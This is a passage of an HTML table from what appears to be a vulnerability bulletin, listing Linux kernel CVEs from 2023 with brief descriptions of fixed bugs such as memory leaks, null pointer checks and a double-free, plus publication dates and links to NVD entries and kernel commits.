<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52680" target="_blank">CVE-2023-52680</a><br><a href="https://git.kernel.org/stable/c/3a09488f4f67f7ade59b8ac62a6c7fb29439cf51" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/50603a67daef161c78c814580d57f7f0be57167e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/773e38f73461ef2134a0d33a08f1668edde9b7c3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/821fbaeaaae23d483d3df799fe91ec8045973ec3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cda7762bea857e6951315a2f7d0632ea1850ed43" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: efivarfs: Free s_fs_info on unmount Now that we allocate a s_fs_info struct on fs context creation, we should ensure that we free it again when the superblock goes away.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52681" target="_blank">CVE-2023-52681</a><br><a href="https://git.kernel.org/stable/c/48be1364dd387e375e1274b76af986cb8747be2c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/547713d502f7b4b8efccd409cff84d731a23853b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/92be3095c6ca1cdc46237839c6087555be9160e3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ea6b597fcaca99562fa56a473bcbbbd79b40af03" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to wait on block writeback for post_read case If inode is compressed, but not encrypted, it missed to call f2fs_wait_on_block_writeback() to wait for GCed page writeback in IPU write path. Thread A GC-Thread - f2fs_gc - do_garbage_collect - gc_data_segment - move_data_block - f2fs_submit_page_write migrate normal cluster's block via meta_inode's page cache - f2fs_write_single_data_page - f2fs_do_write_data_page - f2fs_inplace_write_data - f2fs_submit_page_bio IRQ - f2fs_read_end_io IRQ old data overrides new data due to out-of-order GC and common IO. - f2fs_read_end_io</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52682" target="_blank">CVE-2023-52682</a><br><a href="https://git.kernel.org/stable/c/4535be48780431753505e74e1b1ad4836a189bc2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/55fdc1c24a1d6229fe0ecf31335fb9a2eceaaa00" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9bfd5ea71521d0e522ba581c6ccc5db93759c0c3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f904c156d8011d8291ffd5b6b398f3747e294986" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ACPI: LPIT: Avoid u32 multiplication overflow In lpit_update_residency() there is a possibility of overflow in multiplication, if tsc_khz is large enough (&gt; UINT_MAX/1000). Change multiplication to mul_u32_u32(). Found by Linux Verification Center (linuxtesting.org) with SVACE.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52683" target="_blank">CVE-2023-52683</a><br><a href="https://git.kernel.org/stable/c/56d2eeda87995245300836ee4dbd13b002311782" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/647d1d50c31e60ef9ccb9756a8fdf863329f7aee" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6c38e791bde07d6ca2a0a619ff9b6837e0d5f9ad" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/72222dfd76a79d9666ab3117fcdd44ca8cd0c4de" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b7aab9d906e2e252a7783f872406033ec49b6dae" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c1814a4ffd016ce5392c6767d22ef3aa2f0d4bd1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d1ac288b2742aa4af746c5613bac71760fadd1c4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f39c3d578c7d09a18ceaf56750fc7f20b02ada63" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: firmware: qcom: qseecom: fix memory leaks in error paths Fix instances of returning error codes directly instead of jumping to the relevant labels where memory allocated for the SCM calls would be freed.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52684" target="_blank">CVE-2023-52684</a><br><a href="https://git.kernel.org/stable/c/6c57d7b593c4a4e60db65d5ce0fe1d9f79ccbe9b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/85fdbf6840455be64eac16bdfe0df3368ee3d0f0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: pstore: ram_core: fix possible overflow in persistent_ram_init_ecc() In persistent_ram_init_ecc(), on 64-bit arches DIV_ROUND_UP() will return 64-bit value since persistent_ram_zone::buffer_size has type size_t which is derived from the 64-bit *unsigned long*, while the ecc_blocks variable this value gets assigned to has (always 32-bit) *int* type. Even if that value fits into *int* type, an overflow is still possible when calculating the size_t typed ecc_total variable further below since there's no cast to any 64-bit type before multiplication. Declaring the ecc_blocks variable as *size_t* should fix this mess... Found by Linux Verification Center (linuxtesting.org) with the SVACE static analysis tool.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52685" target="_blank">CVE-2023-52685</a><br><a href="https://git.kernel.org/stable/c/3b333cded94fbe5ce30d699b316c4715151268ae" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/48dcfc42ce705b652c0619cb99846afc43029de9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/86222a8fc16ec517de8da2604d904c9df3a08e5d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8fb12524c86bdd542a54857d5d076b1b6778c78c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a34946ec3de88a16cc3a87fdab50aad06255a22b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/acd413da3e1f37582207cd6078a41d57c9011918" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d1fe1aede684bd014714dacfdc75586a9ad38657" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f9b891a7e8fcf83901f8507241e23e7420103b61" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: powerpc/powernv: Add a null pointer check in opal_event_init() kasprintf() returns a pointer to dynamically allocated memory which can be NULL upon failure.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52686" target="_blank">CVE-2023-52686</a><br><a href="https://git.kernel.org/stable/c/8422d179cf46889c15ceff9ede48c5bfa4e7f0b4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8649829a1dd25199bbf557b2621cedb4bf9b3050" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9a523e1da6d88c2034f946adfa4f74b236c95ca9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a14c55eb461d630b836f80591d8caf1f74e62877" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c0b111ea786ddcc8be0682612830796ece9436c7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e08c2e275fa1874de945b87093f925997722ee42" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e6ad05e3ae9c84c5a71d7bb2d44dc845ae7990cf" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e93d7cf4c1ddbcd846739e7ad849f955a4f18031" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: crypto: safexcel - Add error handling for dma_map_sg() calls Macro dma_map_sg() may return 0 on error. This patch enables checks in case of the macro failure and ensures unmapping of previously mapped buffers with dma_unmap_sg(). Found by Linux Verification Center (linuxtesting.org) with static analysis tool SVACE.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52687" target="_blank">CVE-2023-52687</a><br><a href="https://git.kernel.org/stable/c/4c0ac81a172a69a7733290915276672787e904ec" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8084b788c2fb1260f7d44c032d5124680b20d2b2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/87e02063d07708cac5bfe9fd3a6a242898758ac8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fc0b785802b856566df3ac943e38a072557001c4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: fix the error handler of rfkill config When the core rfkill config throws error, it should free the allocated resources. Currently it is not freeing the core pdev create resources. Avoid this issue by calling the core pdev destroy in the error handler of core rfkill config. Found this issue in the code review and it is compile tested only.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52688" target="_blank">CVE-2023-52688</a><br><a href="https://git.kernel.org/stable/c/898d8b3e1414cd900492ee6a0b582f8095ba4a1a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b4e593a7a22fa3c7d0550ef51c90b5c21f790aa8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ALSA: scarlett2: Add missing mutex lock around get meter levels As scarlett2_meter_ctl_get() uses meter_level_map[], the data_mutex should be locked while accessing it.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52689" target="_blank">CVE-2023-52689</a><br><a href="https://git.kernel.org/stable/c/74e3de7cdcc31ce75ab42350ae0946eff62a2da2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/993f7b42fa066b055e3a19b7f76ad8157c0927a0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: powerpc/powernv: Add a null pointer check to scom_debug_init_one() kasprintf() returns a pointer to dynamically allocated memory which can be NULL upon failure. Add a null pointer check, and release 'ent' to avoid memory leaks.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52690" target="_blank">CVE-2023-52690</a><br><a href="https://git.kernel.org/stable/c/1eefa93faf69188540b08b024794fa90b1d82e8b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2a82c4439b903639e0a1f21990cd399fb0a49c19" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9a260f2dd827bbc82cc60eb4f4d8c22707d80742" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a9c05cbb6644a2103c75b6906e9dafb9981ebd13" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/dd8422ff271c22058560832fc3006324ded895a9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ed8d023cfa97b559db58c0e1afdd2eec7a83d8f2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f84c1446daa552e9699da8d1f8375eac0f65edc7" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/amd/pm: fix a double-free in si_dpm_init When the allocation of adev-&gt;pm.dpm.dyn_state.vddc_dependency_on_dispclk.entries fails, amdgpu_free_extended_power_table is called to free some fields of adev. However, when the control flow returns to si_dpm_sw_init, it goes to label dpm_failed and calls si_dpm_fini, which calls amdgpu_free_extended_power_table again and free those fields again. Thus a double-free is triggered.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52691" target="_blank">CVE-2023-52691</a><br><a href="https://git.kernel.org/stable/c/06d95c99d5a4f5accdb79464076efe62e668c706" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2bf47c89bbaca2bae16581ef1b28aaec0ade0334" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ac16667237a82e2597e329eb9bc520d1cf9dff30" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/aeed2b4e4a70c7568d4a5eecd6a109713c0dfbf4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/afe9f5b871f86d58ecdc45b217b662227d7890d0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ca8e2e251c65e5a712f6025e27bd9b26d16e6f4a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f957a1be647f7fc65926cbf572992ec2747a93f2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/fb1936cb587262cd539e84b34541abb06e42b2f9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ALSA: scarlett2: Add missing error check to scarlett2_usb_set_config() scarlett2_usb_set_config() calls scarlett2_usb_get() but was not checking the result. Return the error if it fails rather than continuing with an invalid value.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52692" target="_blank">CVE-2023-52692</a><br><a href="https://git.kernel.org/stable/c/145c5aa51486171025ab47f35cff34bff8d0cea3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/51d5697e1c0380d482c3eab002bfc8d0be177e99" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/996fde492ad9b9563ee483b363af40d7696a8467" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/be96acd3eaa790d10a5b33e65267f52d02f6ad88" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ca459dfa7d4ed9098fcf13e410963be6ae9b6bf3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ACPI: video: check for error while searching for backlight device parent If acpi_get_parent() called in acpi_video_dev_register_backlight() fails, for example, because acpi_ut_acquire_mutex() fails inside acpi_get_parent), this can lead to incorrect (uninitialized) acpi_parent handle being passed to acpi_get_pci_dev() for detecting the parent pci device. Check acpi_get_parent() result and set parent device only in case of success. Found by Linux Verification Center (linuxtesting.org) with SVACE.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52693" target="_blank">CVE-2023-52693</a><br><a href="https://git.kernel.org/stable/c/1e3a2b9b4039bb4d136dca59fb31e06465e056f3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/2124c5bc22948fc4d09a23db4a8acdccc7d21e95" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/39af144b6d01d9b40f52e5d773e653957e6c379c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3a370502a5681986f9828e43be75ce26c6ab24af" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/556f02699d33c1f40b1b31bd25828ce08fa165d8" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/72884ce4e10417b1233b614bf134da852df0f15f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c4e1a0ef0b4782854c9b77a333ca912b392bed2f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ccd45faf4973746c4f30ea41eec864e5cf191099" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/bridge: tpd12s015: Drop buggy __exit annotation for remove function With tpd12s015_remove() marked with __exit this function is discarded when the driver is compiled as a built-in. The result is that when the driver unbinds there is no cleanup done which results in resource leakage or worse.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52694" target="_blank">CVE-2023-52694</a><br><a href="https://git.kernel.org/stable/c/08ccff6ece35f08e8107e975903c370d849089e5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/53926e2a39629702f7f809d614b3ca89c2478205" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/81f1bd85960b7a089a91e679ff7cd2524390bbf1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a8657406e12aa10412134622c58977ac657f16d2" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ce3e112e7ae854249d8755906acc5f27e1542114" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e00ec5901954d85b39b5f10f94e60ab9af463eb1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Check writeback connectors in create_validate_stream_for_sink [WHY &amp; HOW] This is to check connector type to avoid unhandled null pointer for writeback connectors.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52695" target="_blank">CVE-2023-52695</a><br><a href="https://git.kernel.org/stable/c/0fe85301b95077ac4fa4a91909d38b7341e81187" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/dbf5d3d02987faa0eec3710dd687cd912362d7b5" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: powerpc/powernv: Add a null pointer check in opal_powercap_init() kasprintf() returns a pointer to dynamically allocated memory which can be NULL upon failure.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52696" target="_blank">CVE-2023-52696</a><br><a href="https://git.kernel.org/stable/c/69f95c5e9220f77ce7c540686b056c2b49e9a664" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/6b58d16037217d0c64a2a09b655f370403ec7219" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9da4a56dd3772570512ca58aa8832b052ae910dc" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a67a04ad05acb56640798625e73fa54d6d41cce1" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b02ecc35d01a76b4235e008d2dd292895b28ecab" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e123015c0ba859cf48aa7f89c5016cc6e98e018d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f152a6bfd187f67afeffc9fd68cbe46f51439be0" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: ASoC: Intel: sof_sdw_rt_sdca_jack_common: ctx-&gt;headset_codec_dev = NULL sof_sdw_rt_sdca_jack_exit() are used by different codecs, and some of them use the same dai name. For example, rt712 and rt713 both use "rt712-sdca-aif1" and sof_sdw_rt_sdca_jack_exit(). As a result, sof_sdw_rt_sdca_jack_exit() will be called twice by mc_dailink_exit_loop(). Set ctx-&gt;headset_codec_dev = NULL; after put_device(ctx-&gt;headset_codec_dev); to avoid ctx-&gt;headset_codec_dev being put twice.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52697" target="_blank">CVE-2023-52697</a><br><a href="https://git.kernel.org/stable/c/582231a8c4f73ac153493687ecc1bed853e9c9ef" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a410d58117d6da4b7d41f3c91365f191d006bc3d" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/e38e252dbceeef7d2f848017132efd68e9ae1416" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: calipso: fix memory leak in netlbl_calipso_add_pass() If IPv6 support is disabled at boot (ipv6.disable=1), the calipso_init() -&gt; netlbl_calipso_ops_register() function isn't called, and the netlbl_calipso_ops_get() function always returns NULL. In this case, the netlbl_calipso_add_pass() function allocates memory for the doi_def variable but doesn't free it with the calipso_doi_free(). BUG: memory leak unreferenced object 0xffff888011d68180 (size 64): comm "syz-executor.1", pid 10746, jiffies 4295410986 (age 17.928s) hex dump (first 32 bytes): 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [&lt;...&gt;] kmalloc include/linux/slab.h:552 [inline] [&lt;...&gt;] netlbl_calipso_add_pass net/netlabel/netlabel_calipso.c:76 [inline] [&lt;...&gt;] netlbl_calipso_add+0x22e/0x4f0 net/netlabel/netlabel_calipso.c:111 [&lt;...&gt;] genl_family_rcv_msg_doit+0x22f/0x330 net/netlink/genetlink.c:739 [&lt;...&gt;] genl_family_rcv_msg net/netlink/genetlink.c:783 [inline] [&lt;...&gt;] genl_rcv_msg+0x341/0x5a0 net/netlink/genetlink.c:800 [&lt;...&gt;] netlink_rcv_skb+0x14d/0x440 net/netlink/af_netlink.c:2515 [&lt;...&gt;] genl_rcv+0x29/0x40 net/netlink/genetlink.c:811 [&lt;...&gt;] netlink_unicast_kernel net/netlink/af_netlink.c:1313 [inline] [&lt;...&gt;] netlink_unicast+0x54b/0x800 net/netlink/af_netlink.c:1339 [&lt;...&gt;] netlink_sendmsg+0x90a/0xdf0 net/netlink/af_netlink.c:1934 [&lt;...&gt;] sock_sendmsg_nosec net/socket.c:651 [inline] [&lt;...&gt;] sock_sendmsg+0x157/0x190 net/socket.c:671 [&lt;...&gt;] ____sys_sendmsg+0x712/0x870 net/socket.c:2342 [&lt;...&gt;] ___sys_sendmsg+0xf8/0x170 net/socket.c:2396 [&lt;...&gt;] __sys_sendmsg+0xea/0x1b0 net/socket.c:2429 [&lt;...&gt;] do_syscall_64+0x30/0x40 arch/x86/entry/common.c:46 [&lt;...&gt;] entry_SYSCALL_64_after_hwframe+0x61/0xc6 Found by InfoTeCS on behalf of Linux Verification Center (linuxtesting.org) with Syzkaller [PM: merged via the LSM tree at Jakub Kicinski request]</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52698" target="_blank">CVE-2023-52698</a><br><a href="https://git.kernel.org/stable/c/321b3a5592c8a9d6b654c7c64833ea67dbb33149" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/36e19f84634aaa94f543fedc0a07588949638d53" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/408bbd1e1746fe33e51f4c81c2febd7d3841d031" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/44a88650ba55e6a7f2ec485d2c2413ba7e216f01" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/9a8f811a146aa2a0230f8edb2e9f4b6609aab8da" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a4529a08d3704c17ea9c7277d180e46b99250ded" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ec4e9d630a64df500641892f4e259e8149594a99" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f14d36e6e97fe935a20e0ceb159c100f90b6627c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: xen-netfront: Add missing skb_mark_for_recycle Notice that skb_mark_for_recycle() is introduced later than fixes tag in commit 6a5bcd84e886 ("page_pool: Allow drivers to hint on SKB recycling"). It is believed that fixes tag were missing a call to page_pool_release_page() between v5.9 to v5.14, after which is should have used skb_mark_for_recycle(). Since v6.6 the call page_pool_release_page() were removed (in commit 535b9c61bdef ("net: page_pool: hide page_pool_release_page()") and remaining callers converted (in commit 6bfef2ec0172 ("Merge branch 'net-page_pool-remove-page_pool_release_page'")). This leak became visible in v6.8 via commit dba1b8a7ab68 ("mm/page_pool: catch page_pool memory leaks").</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
